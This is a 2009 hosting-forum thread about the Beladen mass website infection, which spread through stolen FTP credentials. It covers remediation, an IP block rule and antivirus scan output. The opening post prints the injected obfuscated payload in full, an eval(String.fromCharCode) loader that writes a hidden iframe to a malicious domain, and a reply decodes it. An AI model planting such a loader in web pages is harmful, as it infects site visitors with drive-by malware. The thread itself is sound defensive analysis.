Latest Announcemnent
New thread

Over 40,000 Websites Infected By Growing Beladen Virus

Status
Not open for further replies.
A

apirateslife

Active Member
166
2008
0
0
More than 40,000 websites have fallen victim to a virus attack that is still growing, security experts have said.

Security firm Websense says the site beladen.net is infecting legitimate websites all over the world with malicious code that then tries to install malware on the computers of people visiting them.

The Beladen virus is still active, with the number of affected sites growing from 20,000 to over 40,000 since Friday.

Carl Leonard, security research manager for EMEA at Websense, said the Beladen virus poses a "pretty serious" threat to users.

"We are trying to look into how these sites are compromised in the first place," he said. Anti-virus detection capability is also not that high, with 13 out of 40 systems tested by Websense failing to detect the malware.
Click to expand...
Code: 
http://www.computerweekly.com/Articles/2009/06/03/236279/over-40000-sites-infected-by-growing-beladen-virus.htm
I had one client that was infected with this virus. Apparently it logs FTP information, then tries to login via FTP, once logged in the virus adds malicious code to all index.* files and then spreads itself to visitors of the victims website.

After I learned my clients website was infected. I suspended the account and removed the malicious code from the index files, changed the hosting account password, and advised my client to scan his computer for viruses with Avira Premium Security.

Here is the Malicious code the virus embeds into the files:
Code: 
<?php echo ''; ?><?php echo ''; ?><?php echo '<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,106,104,113,119,61,49,50,51,49,49,49,51,43,50,53,59,118,97,114,32,103,104,103,52,53,61,34,107,97,114,34,59,118,97,114,32,119,61,34,108,97,115,116,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,39,43,39,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,103,103,54,51,52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,61,57,43,55,53,52,52,59,125,32,118,97,114,32,109,110,98,113,61,52,51,48,52,49,56,50,52))</script>'; ?>
Whenever someone visits an infected website it will prompt them to download a malicious PDF document, and if Adobe Reader is installed it will exploit Adobe reader and install trojans on the victims system.

There have been numerous reports on both the DirectAdmin and cPanel forums.

Code: 
http://www.directadmin.com/forum/showthread.php?p=157823
http://forums.cpanel.net/general/62821-iframe-javascript-hacks-35.html
We have seen lots of this as well and EVERY TIME the cause has been traced to a virus on the user's machine that was either stealing their ftp credentials from their stored passwords or (more likely) sniffing their username and password during an ftp session since ftp in a cleartext protocol. The virus would either then "phone home" or fire up it's own ftp connection and dl all .htm, .html and .php files from the user's account, add it's iframe or js code and reupload.

Just changing the ftp password makes no difference since the new password it compromised the very next time they make a connection (usually to fix their pages).

The only relief was to make sure their machine is virus free, and change passwords. As an addition, we also educate them to the advantages of using sftp instead of ftp and also point out that the same hijacking can occur with email passwords if they don't use encryption there too.
Click to expand...
Code: 
http://www.directadmin.com/forum/showpost.php?p=158146&postcount=22
The IP that is reponsible for adding the malicious code.
Code: 
91.212.65.147
Code: 
http://whois.domaintools.com/91.212.65.0
If you're running a windows machine I recommend you uninstall Adobe PDF Reader, and install Avira Premium Security Suite as it detects and prevents this virus ;).
Code: 
http://www.avira.com/en/downloads/avira_premium_security_suite.html
If you're a webmaster, webhost, or internet user. I recommend blocking this IP range with your firewall.
Code: 
 91.212.65.0/24
IP Tables:
Code: 
 iptables -I INPUT -s 91.212.65.0/24 -j DROP
An easy way to see if your website has been infected, would be to download a backup of your files and scan the backup archive with Avira Premium Security Suite.
Code: 
--> ./tmp/webalizerftp/index.html
        [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
      --> ./tmp/webalizer/domain.com/index.html
        [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
      --> ./tmp/webalizer/index.html
        [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
      --> ./tmp/webalizer/domain.com/index.html
        [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
      --> ./tmp/webalizer/domain.com/index.html
        [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
      --> ./public_html/sandbox/ips_kernel/index.html
        [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
      --> ./public_html/sandbox/converge_local/index.html
        [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
      --> ./public_html/sandbox/public/index.html
        [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
      --> ./public_html/sandbox/uploads/index.html
        [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
      --> ./public_html/sandbox/interface/index.html
        [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
      --> ./public_html/sandbox/cache/index.html
        [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
If you have been infected, then scan your computer for viruses, and change your passwords after your machine is virus free.

My friend reported that a website on Katz tried to force him to download a PDF document. So don't download any magical PDF documents ;).
 
11 comments
Nice to see :)
I've decoded the javascript code
Code: 
118,97,114,32,106,104,113,119,61,49,50,51,49,49,49,51,43,50,53,59,118,97,114,32,103,104,103,52,53,61,34,107,97,114,34,59,118,97,114,32,119,61,34,108,97,115,116,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,39,43,39,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,103,103,54,51,52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,61,57,43,55,53,52,52,59,125,32,118,97,114,32,109,110,98,113,61,52,51,48,52,49,56,50,52
Decoded
Code: 
var jhqw=1231113+25;var ghg45="kar";var w="last";var re6=".";var h2h="com";var a="ifr";var s="htt";document.write('<'+a+'ame sr'+'c="'+s+'p://'+ghg45+''+w+''+re6+''+h2h+'/'+'" wid'+'th="1" h'+'eight="3">'); function gg6345(){var as3113=9+7544;} var mnbq=4304182
And after processing manually the decoded javascript you get
Code: 
<iframe src='http://karlast.com/' width='1' height='3'>

And probably from that website, he sent the virus atack.
 
Yeah, it came from that website and that domain has been blocked for abuse already.

Code: 
http://whois.domaintools.com/karlast.com
They could be using other domains as well.
 
Hello guys,
First of all i really thank you for all the information .
I did deny all ip's from my site beginning from 91.212.65.0 and ending at 91.212.65.255
Is this ok ?
I removed foxit PDF reader , my site currently does not require any PDF files to be downloaded, so is it free of virus ?
 
Why did you remove Foxit PDF Reader? Just don't use Adobe Reader and don't open PDF files that you didn't requested.
 
this virus was did the 'job' of a backdoor script for website, sending traffic to the main website wich now is down. So it became an useless virus as long as the visitators are sent to a non working page.
Good to remeber, but this virus wasn't so powerfull.
 
Status
Not open for further replies.
Back
Top